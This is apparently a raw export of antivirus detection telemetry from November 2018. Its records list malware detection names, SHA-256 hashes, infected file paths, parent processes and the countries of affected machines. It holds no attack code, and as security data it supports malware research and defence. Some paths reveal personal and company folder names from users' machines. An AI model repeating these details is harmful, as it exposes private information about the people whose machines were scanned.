  Row(detection=Row(filename='avscan-20181101-154806-71ff6a07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154806-71FF6A07', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154932-806b5462', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154932-806B5462', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:16:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='0188bf7cf780331bcef40de46ea8c9bd34f17ed7e681b496893f590ac5ab1df1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6534200, timestamp='2018-11-01T13:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='080805.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\080805\\080805.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='report_garment.pif', filepath='D:\\DATA_SHARE\\program\\HRD_GARMENT\\report_garment\\report_garment.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='garment 2013-2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\DUMTK GARMENT 2013-2015\\GARMENT 2013-2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe811_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe811 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T00:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T08:15:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audit.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\FOTO AUDIT\\AUDIT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192617-7294a1f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-192617-7294A1F1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160130-f96a57d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160130-F96A57D4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155418-8be2ed60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a527815d\\AVSCAN-20181101-155405-89E372CE\\AVSCAN-20181101-155418-8BE2ED60', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:54:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110240-bbc622fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110240-BBC622FB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-040702-0d374d5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a3a329b\\AVSCAN-20181101-040614-F0385F4B\\AVSCAN-20181101-040702-0D374D5D', filesize=256000, name='TR/Crypter.davcp.#M1.#R1'), hash='9cea3e29dd6c6eb886217a076c3a142667f24313e26e72cd57cb6fcc4415ec84', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110855-eb22a59e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110855-EB22A59E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Downloads\\Files\\Setup.exe', filesize=55424000, name='HEUR/AGEN.1032309.#M1.#R1'), hash='aa681078e0e7772a97f51dacaf6e880ae82f39b1979b302e90aff452ebac2f73', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b33bb3ac041c00d733a4b3cfe4358961e05a0060de27643c4c016f7d473d0541', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B33BB3AC041C00D733A4B3CFE4358961E05A0060DE27643C4C016F7D473D0541', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b33bb3ac041c00d733a4b3cfe4358961e05a0060de27643c4c016f7d473d0541', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124439-16e1a676', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124419-05628A42\\AVSCAN-20181101-124439-16E1A676', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='5eb22c98e6e97f8363ce8e0fd3228120bec8d96e85fe9a6c2bbdd0c365b7e53e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\C.Framework\\MSIExec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T08:18:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4919604.exe', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\4919604.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cours de proba l2.exe', filepath='G:\\prob2\\COURS DE PROBA L2.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:52:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,fpwxeprz', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110205-b75732ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110205-B75732AC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T07:52:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e67162beba5843e5eaa93bb55a3036a0a24fcbf75642f5745e0fcfd83454b54b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\E67162BEBA5843E5EAA93BB55A3036A0A24FCBF75642F5745E0FCFD83454B54B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e67162beba5843e5eaa93bb55a3036a0a24fcbf75642f5745e0fcfd83454b54b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:49:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cap3onn.exe', filepath='D:\\c\\LBP1120_WinXP\\CAP3ONN.EXE', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='c66e4b6ec4ea9463378f9a53b333df3a8bd3cd832c64ceb25263a6032586baf1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:33:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsd96C4.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=7045848, timestamp='2018-11-01T17:46:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='TH', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:n3Aet5A7bECMkBLI.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T20:52:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002527-4bc04617', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002527-4BC04617', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af557', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af557', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='assassinscreedrevelations.exe', filepath='D:\\Black_Box\\Assassins Creed - Revelations\\AssassinsCreedRevelations.exe', filesize=768000, name='W32/Jeefo.A.#M1.#R1'), hash='3d49bf6c0f801ab808324bc5511856dd3c1c9c8de34192396465aaa16279500c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:40:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002323-3e4ec7c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002323-3E4EC7C7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unblockpin.exe', filepath='C:\\Program Files\\D-com 3G\\UnblockPin.exe', filesize=41472000, name='W32/Sality.AT.#M1.#R1'), hash='14e3bc696c7c4e79bc4cd2bf41f9ab2e0e4c3cd9747c603b5ec045ecd9a6bfba', metadata=Row(cmdline='\\\\\\"C:\\\\\\/Program Files\\\\\\/fast connect\\\\\\/UpdateDog\\\\\\/\\\\\\"', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\ProgramData\\fast connect\\OnlineUpdate\\ouc.exe', parentsize=41697280, timestamp='2018-11-01T14:56:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171737-d2d4c837', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d8cdd07\\AVSCAN-20181101-171709-CC650041\\AVSCAN-20181101-171737-D2D4C837', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:17:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ghpusbfw.exe', filepath='\\\\?\\J:\\iso\\files\\tools\\gHPUSBFW.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221054-4309a12c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1e6ba50\\AVSCAN-20181101-221008-3A8005FF\\AVSCAN-20181101-221054-4309A12C', filesize=1536000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002350-4147d6cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002350-4147D6CD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa24264.42953\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa24264.42953\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:23:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='street fighter iv.exe', filepath='F:\\Loaders\\Source\\Oyunlar\\Street Fighter IV\\Street Fighter IV.exe', filesize=1344000, name='HEUR/AGEN.1000290.#M1.#R1'), hash='70026204a95a1c4a3cc6fbbe5396b4dd43668650a66d9883cc7a4e88ace5cbcd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245280, timestamp='2018-11-01T12:27:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ad-aware-522-downloader.exe', filepath='C:\\Users\\X\\Desktop\\Medion\\Datensicherung Medion\\MKnetzger\\Downloads\\ad-aware-522-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7cfbe228740d995a5a99972e9e7fc5849f8de1bbdea59dfcab61d15ec902eee3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Y9tHYuwhR0uiy3CV.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:17:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5436.13797\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5436.13797\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:35:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001b30', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001b30', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200906-0b425277', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b9bb835\\AVSCAN-20181101-200841-05E729F0\\AVSCAN-20181101-200906-0B425277', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:09:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:10:17Z'), dt=datetime.date(2018, 11, 1)),
